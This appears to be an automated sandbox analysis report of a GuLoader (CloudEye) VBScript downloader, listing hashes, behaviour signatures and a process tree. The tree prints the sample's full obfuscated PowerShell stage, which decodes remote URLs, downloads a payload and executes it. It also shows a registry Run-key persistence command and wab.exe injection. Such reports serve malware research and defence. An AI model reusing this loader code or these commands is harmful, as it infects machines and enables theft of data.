Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-07-2024 18:54

General

  • Target

    b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79.vbs

  • Size

    102KB

  • MD5

    01c94fd161a6999247d5f39f63bdeecf

  • SHA1

    f5da84dd0df3da70aa7cc5167d3a870aec691bd8

  • SHA256

    b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79

  • SHA512

    ac62e8e35dff33dec16b4cb9faed77dbbe8e5b51d1576495d12aed0eb0ab81f92ae6af6087441e812a7ce9a102898ed4e5622e68b87c5d6b7b8d9999dd599a1d

  • SSDEEP

    3072:c4oGKaBSPReHzR0WAjT28fyxa+CS64B9Ou4rIQCtvfCS5x:pt7SPReHd0WoT28faa+CS64mu8IQCtv/

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 31 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 30 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 31 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1300
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems';If (${host}.CurrentCulture) {$Dominator++;}Function Swatheable($Ethography){$Etagevaskens=$Ethography.Length-$Dominator;$Aseismic='SUBsTR';$Aseismic+='ing';For( $Sluicing=1;$Sluicing -lt $Etagevaskens;$Sluicing+=2){$Dissatisfying+=$Ethography.$Aseismic.Invoke( $Sluicing, $Dominator);}$Dissatisfying;}function Overdaadiges($Writeup227){ . ($Eftersynkroniser) ($Writeup227);}$Riffelgangen=Swatheable 'BMAoUz.i,l l a,/E5 . 0K ( W iMn d.o,wRs N Tg p1.0 . 0 ;. WFi nB6 4S;, x 6A4B;, sr,v : 1.2.1 . 0g) BGLe c.ksoA/f2 0 1m0M0 1O0,1, FSiDrFeRf o x /K1 2U1T. 0R ';$Spaltedefinition=Swatheable 'PU s eOrS- ADg.eSn t. ';$Stormhat=Swatheable 'Ph t t p sN:T/s/Bm,o.v.i e s.mDaRc kBtAa.l kE. c oKm /RKSoOl oTnAiGaTl vSa,r e nA. eBm,zI>IhNtKt pns.: /,/FmKiElRaLnsa,cDeJs,.OcSo m,/CKDo lTo n,i a lVv aLr e,n .UeOm z > hUtPt p :A/./C1 0R3 .R1F9,5.. 2.3Y7,.C4 3H/ K o l o nBi.a,lSvFa rAeUnF.Se,mAz.> h tht.p s :./ /DfCi,rSsUt 4.lNoPc.k s mGiMtBh sA.Bc oI. u k,/HK.oMleo.nLiFa l vIa.rPefnM. eKm.z ';$Barskt=Swatheable '.>S ';$Eftersynkroniser=Swatheable ' iSeOx. ';$Hyperpolysyllabically='Nederdrgtigeres';$Direktrstols = Swatheable 'Be,c h,o %DaJpvp dOaHtPaP%.\,CSo q u,e l.uVc,h e 1,4S.Mm,y xL V&S& Re.c hDo FtE ';Overdaadiges (Swatheable 'H$ g lHoNbtavl,:KDLozgVw o o d =H(,c m d, /.cH $ DEiKrPe.kItDr.s,t oTl s )A ');Overdaadiges (Swatheable ' $ g.l o bSa.lP: O,t.aUrRiIi.n eM= $DS tLoUr mHh a.tM.Js p lBiHt (S$ B a r sSk t )L ');Overdaadiges (Swatheable 'P[ NBe t . S.e rSv.iUc e PIo iBn.tFM aDn.a g eRr ]P: :BS,eEcNu r iItmyFP rUoWtBo cPoUl .=S [SN,eIt .HS eAcPuUriiAtAyFPKr oHthoPcSoDl T.y p eM]k: :,TSlGsA1,2a ');$Stormhat=$Otariine[0];$Maintainable= (Swatheable 'l$sgOl.oFbaaKlL:.G e nfn.eUmMsAn iEt.sPtSa lPsB=RNAe,wP-,ORbIj,eSc t NS y s,t.eHm . N eHt . W,eSb.C,l iSe n t');$Maintainable+=$Dogwood[1];Overdaadiges ($Maintainable);Overdaadiges (Swatheable 'B$ G eAn nAe m.s n i tVsSt acl.s..,HDeMa d,e,rms [ $ S p.a.lSt.e d e fCiCn i t,i,o n ].=,$SR,iMf.fDe l g.aSn gJeOnB ');$Uddunstningen=Swatheable 'A$.G e n,n e mBsTnci tBsGt,aLl s..MD,oAw nMl,oGa d FDihlFe ( $ SHtBo r m hVaAtK, $ l,o kBaTlOi sDe rPi nMgPsUpar,iMn c i pSpHe,r.nEe sD) ';$lokaliseringsprincippernes=$Dogwood[0];Overdaadiges (Swatheable ' $Cg l oSb.aIl.:URAeInMgBuOeSrMa = (ST e s tF- PSaAt hW U$BlRoSkNa.l.iDsAeMr i,n g.s p.rNi n cSirpbpAeBr.nAe s )C ');while (!$Renguera) {Overdaadiges (Swatheable '.$ gIl o bAaFlS:ML.uKf.t e nEs,=O$ t rOu.e, ') ;Overdaadiges $Uddunstningen;Overdaadiges (Swatheable ',S,tna.rPtH-US lre eTpC .4. ');Overdaadiges (Swatheable 'R$Wg l.oSb akl :SR eDn.gPu eCr,a = (LT,eUs tD-EP.aStNh B$ l o kSaul,iTs,e r i nPgSsTp r ibn cBi.pPpAe.r nSe,s,)U ') ;Overdaadiges (Swatheable ',$Sgal oObFa.lM:FU,nShBeGrUmCistDi cCa.l.lSyP= $,g lVo bRaKl,:,KRv a tDoirAi abl gFuAi nfeUaBn e,rKe n + +P%N$OO t.aTrMi i n,eD. c oSuPnLtV ') ;$Stormhat=$Otariine[$Unhermitically];}$Agnellis=370878;$Underprikket=26015;Overdaadiges (Swatheable '.$TgEl.oAbEa l :AHSmUo,sStHa sAepoTmMr a a dPe.tA F=. AG eIt.-.CFo n tFe n,tB R$Sl o,kAaIl,iTs e rKiSnAgSs pnr,iWn,c.iMp pKeIr nTefsB ');Overdaadiges (Swatheable 'p$KgSl o b,aAl.:IT,eFlTeMsscCoTpUiBn gD H=I ,[,S yDs,t e,m .FC o nTv e.rUt,] :O: F r.o.mTB abs e.6U4 S t,r.i n g (Q$ HDmSoSs tAa.s e.oKmUr.aTaKd e.tS), ');Overdaadiges (Swatheable '.$.gbl o b.aBlU: TLa k tVn x rN =, ,[dS,y,sDtVetm.. TSeBx tS.IE nAcUo dCi nLg ] :D:LA.SrC.I,IM.NG eLt SKtIrCiRn g (K$CTAe l e s.c,oPpLi,nfg )H ');Overdaadiges (Swatheable 'D$,gClSo bAaMlO: S.tAuTb s = $,T,a,kUt.n,xTr . sDumb sUt,r.i.n.g,(P$DAAgTnIe lAlNi.s ,f$TUFnld e rBpFr iAk kSeYtS)S ');Overdaadiges $Stubs;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3824
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coqueluche14.myx && echo t"
        3⤵
          PID:4756
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems';If (${host}.CurrentCulture) {$Dominator++;}Function Swatheable($Ethography){$Etagevaskens=$Ethography.Length-$Dominator;$Aseismic='SUBsTR';$Aseismic+='ing';For( $Sluicing=1;$Sluicing -lt $Etagevaskens;$Sluicing+=2){$Dissatisfying+=$Ethography.$Aseismic.Invoke( $Sluicing, $Dominator);}$Dissatisfying;}function Overdaadiges($Writeup227){ . ($Eftersynkroniser) ($Writeup227);}$Riffelgangen=Swatheable 'BMAoUz.i,l l a,/E5 . 0K ( W iMn d.o,wRs N Tg p1.0 . 0 ;. WFi nB6 4S;, x 6A4B;, sr,v : 1.2.1 . 0g) BGLe c.ksoA/f2 0 1m0M0 1O0,1, FSiDrFeRf o x /K1 2U1T. 0R ';$Spaltedefinition=Swatheable 'PU s eOrS- ADg.eSn t. ';$Stormhat=Swatheable 'Ph t t p sN:T/s/Bm,o.v.i e s.mDaRc kBtAa.l kE. c oKm /RKSoOl oTnAiGaTl vSa,r e nA. eBm,zI>IhNtKt pns.: /,/FmKiElRaLnsa,cDeJs,.OcSo m,/CKDo lTo n,i a lVv aLr e,n .UeOm z > hUtPt p :A/./C1 0R3 .R1F9,5.. 2.3Y7,.C4 3H/ K o l o nBi.a,lSvFa rAeUnF.Se,mAz.> h tht.p s :./ /DfCi,rSsUt 4.lNoPc.k s mGiMtBh sA.Bc oI. u k,/HK.oMleo.nLiFa l vIa.rPefnM. eKm.z ';$Barskt=Swatheable '.>S ';$Eftersynkroniser=Swatheable ' iSeOx. ';$Hyperpolysyllabically='Nederdrgtigeres';$Direktrstols = Swatheable 'Be,c h,o %DaJpvp dOaHtPaP%.\,CSo q u,e l.uVc,h e 1,4S.Mm,y xL V&S& Re.c hDo FtE ';Overdaadiges (Swatheable 'H$ g lHoNbtavl,:KDLozgVw o o d =H(,c m d, /.cH $ DEiKrPe.kItDr.s,t oTl s )A ');Overdaadiges (Swatheable ' $ g.l o bSa.lP: O,t.aUrRiIi.n eM= $DS tLoUr mHh a.tM.Js p lBiHt (S$ B a r sSk t )L ');Overdaadiges (Swatheable 'P[ NBe t . S.e rSv.iUc e PIo iBn.tFM aDn.a g eRr ]P: :BS,eEcNu r iItmyFP rUoWtBo cPoUl .=S [SN,eIt .HS eAcPuUriiAtAyFPKr oHthoPcSoDl T.y p eM]k: :,TSlGsA1,2a ');$Stormhat=$Otariine[0];$Maintainable= (Swatheable 'l$sgOl.oFbaaKlL:.G e nfn.eUmMsAn iEt.sPtSa lPsB=RNAe,wP-,ORbIj,eSc t NS y s,t.eHm . N eHt . W,eSb.C,l iSe n t');$Maintainable+=$Dogwood[1];Overdaadiges ($Maintainable);Overdaadiges (Swatheable 'B$ G eAn nAe m.s n i tVsSt acl.s..,HDeMa d,e,rms [ $ S p.a.lSt.e d e fCiCn i t,i,o n ].=,$SR,iMf.fDe l g.aSn gJeOnB ');$Uddunstningen=Swatheable 'A$.G e n,n e mBsTnci tBsGt,aLl s..MD,oAw nMl,oGa d FDihlFe ( $ SHtBo r m hVaAtK, $ l,o kBaTlOi sDe rPi nMgPsUpar,iMn c i pSpHe,r.nEe sD) ';$lokaliseringsprincippernes=$Dogwood[0];Overdaadiges (Swatheable ' $Cg l oSb.aIl.:URAeInMgBuOeSrMa = (ST e s tF- PSaAt hW U$BlRoSkNa.l.iDsAeMr i,n g.s p.rNi n cSirpbpAeBr.nAe s )C ');while (!$Renguera) {Overdaadiges (Swatheable '.$ gIl o bAaFlS:ML.uKf.t e nEs,=O$ t rOu.e, ') ;Overdaadiges $Uddunstningen;Overdaadiges (Swatheable ',S,tna.rPtH-US lre eTpC .4. ');Overdaadiges (Swatheable 'R$Wg l.oSb akl :SR eDn.gPu eCr,a = (LT,eUs tD-EP.aStNh B$ l o kSaul,iTs,e r i nPgSsTp r ibn cBi.pPpAe.r nSe,s,)U ') ;Overdaadiges (Swatheable ',$Sgal oObFa.lM:FU,nShBeGrUmCistDi cCa.l.lSyP= $,g lVo bRaKl,:,KRv a tDoirAi abl gFuAi nfeUaBn e,rKe n + +P%N$OO t.aTrMi i n,eD. c oSuPnLtV ') ;$Stormhat=$Otariine[$Unhermitically];}$Agnellis=370878;$Underprikket=26015;Overdaadiges (Swatheable '.$TgEl.oAbEa l :AHSmUo,sStHa sAepoTmMr a a dPe.tA F=. AG eIt.-.CFo n tFe n,tB R$Sl o,kAaIl,iTs e rKiSnAgSs pnr,iWn,c.iMp pKeIr nTefsB ');Overdaadiges (Swatheable 'p$KgSl o b,aAl.:IT,eFlTeMsscCoTpUiBn gD H=I ,[,S yDs,t e,m .FC o nTv e.rUt,] :O: F r.o.mTB abs e.6U4 S t,r.i n g (Q$ HDmSoSs tAa.s e.oKmUr.aTaKd e.tS), ');Overdaadiges (Swatheable '.$.gbl o b.aBlU: TLa k tVn x rN =, ,[dS,y,sDtVetm.. TSeBx tS.IE nAcUo dCi nLg ] :D:LA.SrC.I,IM.NG eLt SKtIrCiRn g (K$CTAe l e s.c,oPpLi,nfg )H ');Overdaadiges (Swatheable 'D$,gClSo bAaMlO: S.tAuTb s = $,T,a,kUt.n,xTr . sDumb sUt,r.i.n.g,(P$DAAgTnIe lAlNi.s ,f$TUFnld e rBpFr iAk kSeYtS)S ');Overdaadiges $Stubs;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3592
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coqueluche14.myx && echo t"
            4⤵
              PID:4972
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:4100
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Algoritmiskes" /t REG_EXPAND_SZ /d "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\Coindication\').Fyrsvamp;%Paginerende% ($elektronspillets)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1624
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Algoritmiskes" /t REG_EXPAND_SZ /d "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\Coindication\').Fyrsvamp;%Paginerende% ($elektronspillets)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:4352
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\rzbivks"
                5⤵
                  PID:2904
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2904 -s 12
                    6⤵
                    • Program crash
                    PID:388
                • C:\Program Files (x86)\windows mail\wab.exe
                  "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ctganddgxs"
                  5⤵
                    PID:3272
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 12
                      6⤵
                      • Program crash
                      PID:3448
                  • C:\Program Files (x86)\windows mail\wab.exe
                    "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mvltovwilahgiw"
                    5⤵
                      PID:400
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 12
                        6⤵
                        • Program crash
                        PID:3456
                    • C:\Program Files (x86)\windows mail\wab.exe
                      "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\rendl"
                      5⤵
                        PID:4264
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 12
                          6⤵
                          • Program crash
                          PID:1636
                      • C:\Program Files (x86)\windows mail\wab.exe
                        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\uyanmfeoj"
                        5⤵
                          PID:5116
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 5116 -s 12
                            6⤵
                            • Program crash
                            PID:3076
                        • C:\Program Files (x86)\windows mail\wab.exe
                          "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\eafgnxoixvow"
                          5⤵
                            PID:1352
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 12
                              6⤵
                              • Program crash
                              PID:4436
                          • C:\Program Files (x86)\windows mail\wab.exe
                            "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\yityrwjukssqvydvandjmigzvicenqsn"
                            5⤵
                              PID:2844
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 12
                                6⤵
                                • Program crash
                                PID:1816
                            • C:\Program Files (x86)\windows mail\wab.exe
                              "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\jkgq"
                              5⤵
                                PID:4252
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 12
                                  6⤵
                                  • Program crash
                                  PID:2072
                              • C:\Program Files (x86)\windows mail\wab.exe
                                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\lembkhe"
                                5⤵
                                  PID:3348
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3348 -s 12
                                    6⤵
                                    • Program crash
                                    PID:2180
                                • C:\Program Files (x86)\windows mail\wab.exe
                                  "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\gtiapoyaaegbtlsibnyfqbzhygi"
                                  5⤵
                                    PID:2428
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2428 -s 12
                                      6⤵
                                      • Program crash
                                      PID:1952
                                  • C:\Program Files (x86)\windows mail\wab.exe
                                    "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qnnligjuwmyfesgmlxlyaguqymzijc"
                                    5⤵
                                      PID:2008
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 12
                                        6⤵
                                        • Program crash
                                        PID:3128
                                    • C:\Program Files (x86)\windows mail\wab.exe
                                      "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\apsdiruwkvqkggcyciyalsohhtjrcnjkn"
                                      5⤵
                                        PID:4348
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 12
                                          6⤵
                                          • Program crash
                                          PID:3884
                                      • C:\Program Files (x86)\windows mail\wab.exe
                                        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\veovnxghxrveshhevumtbt"
                                        5⤵
                                          PID:1008
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1008 -s 12
                                            6⤵
                                            • Program crash
                                            PID:2676
                                        • C:\Program Files (x86)\windows mail\wab.exe
                                          "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\xytnfqrblznicnvimfymegnyb"
                                          5⤵
                                            PID:4692
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 12
                                              6⤵
                                              • Program crash
                                              PID:3096
                                          • C:\Program Files (x86)\windows mail\wab.exe
                                            "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ibzygicczhfvftrmwqtoplhhbrpv"
                                            5⤵
                                              PID:4660
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 12
                                                6⤵
                                                • Program crash
                                                PID:956
                                            • C:\Program Files (x86)\windows mail\wab.exe
                                              "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\nkailzhhjmbtbijwgfui"
                                              5⤵
                                                PID:4648
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4648 -s 12
                                                  6⤵
                                                  • Program crash
                                                  PID:3972
                                              • C:\Program Files (x86)\windows mail\wab.exe
                                                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\pefaesrjwutydoyixqhcsma"
                                                5⤵
                                                  PID:1228
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1228 -s 12
                                                    6⤵
                                                    • Program crash
                                                    PID:2756
                                                • C:\Program Files (x86)\windows mail\wab.exe
                                                  "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\zgttfkcdkcllovumhatdvqvyewm"
                                                  5⤵
                                                    PID:1088
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1088 -s 12
                                                      6⤵
                                                      • Program crash
                                                      PID:228
                                                  • C:\Program Files (x86)\windows mail\wab.exe
                                                    "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ungkjjxoyzpfawy"
                                                    5⤵
                                                      PID:4556
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 12
                                                        6⤵
                                                        • Program crash
                                                        PID:2960
                                                    • C:\Program Files (x86)\windows mail\wab.exe
                                                      "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\epmvcbhqmhhjckmwrxu"
                                                      5⤵
                                                        PID:2804
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2804 -s 12
                                                          6⤵
                                                          • Program crash
                                                          PID:4852
                                                      • C:\Program Files (x86)\windows mail\wab.exe
                                                        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\hkzodusjapaomqiaiihrhr"
                                                        5⤵
                                                        • Suspicious use of UnmapMainImage
                                                        PID:2104
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2104 -s 12
                                                          6⤵
                                                          • Program crash
                                                          PID:1660
                                                      • C:\Program Files (x86)\windows mail\wab.exe
                                                        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\bznfhsmvvl"
                                                        5⤵
                                                          PID:1700
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1700 -s 12
                                                            6⤵
                                                            • Program crash
                                                            PID:3068
                                                        • C:\Program Files (x86)\windows mail\wab.exe
                                                          "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ltayalxwjuwuax"
                                                          5⤵
                                                            PID:1556
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1556 -s 12
                                                              6⤵
                                                              • Program crash
                                                              PID:2528
                                                          • C:\Program Files (x86)\windows mail\wab.exe
                                                            "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\wvgqadiqxcozldpwc"
                                                            5⤵
                                                              PID:1680
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1680 -s 12
                                                                6⤵
                                                                • Program crash
                                                                PID:3296
                                                            • C:\Program Files (x86)\windows mail\wab.exe
                                                              "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qktifk"
                                                              5⤵
                                                                PID:3292
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3292 -s 12
                                                                  6⤵
                                                                  • Program crash
                                                                  PID:4628
                                                              • C:\Program Files (x86)\windows mail\wab.exe
                                                                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\tehsfdfdz"
                                                                5⤵
                                                                  PID:2260
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 12
                                                                    6⤵
                                                                    • Program crash
                                                                    PID:4504
                                                                • C:\Program Files (x86)\windows mail\wab.exe
                                                                  "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\dgmlyvqxnock"
                                                                  5⤵
                                                                    PID:3340
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3340 -s 12
                                                                      6⤵
                                                                      • Program crash
                                                                      PID:4168
                                                                  • C:\Program Files (x86)\windows mail\wab.exe
                                                                    "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ipnv"
                                                                    5⤵
                                                                      PID:2436
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2436 -s 12
                                                                        6⤵
                                                                        • Program crash
                                                                        PID:3832
                                                                    • C:\Program Files (x86)\windows mail\wab.exe
                                                                      "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\sktnwff"
                                                                      5⤵
                                                                        PID:2696
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2696 -s 12
                                                                          6⤵
                                                                          • Program crash
                                                                          PID:3016
                                                                      • C:\Program Files (x86)\windows mail\wab.exe
                                                                        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\vmyyxxqfyj"
                                                                        5⤵
                                                                          PID:3932
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3932 -s 12
                                                                            6⤵
                                                                            • Program crash
                                                                            PID:3028
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3272 -ip 3272
                                                                  1⤵
                                                                    PID:4016
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2904 -ip 2904
                                                                    1⤵
                                                                      PID:4600
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 400 -ip 400
                                                                      1⤵
                                                                        PID:788
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4264 -ip 4264
                                                                        1⤵
                                                                          PID:4172
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5116 -ip 5116
                                                                          1⤵
                                                                            PID:5092
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1352 -ip 1352
                                                                            1⤵
                                                                              PID:2696
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2844 -ip 2844
                                                                              1⤵
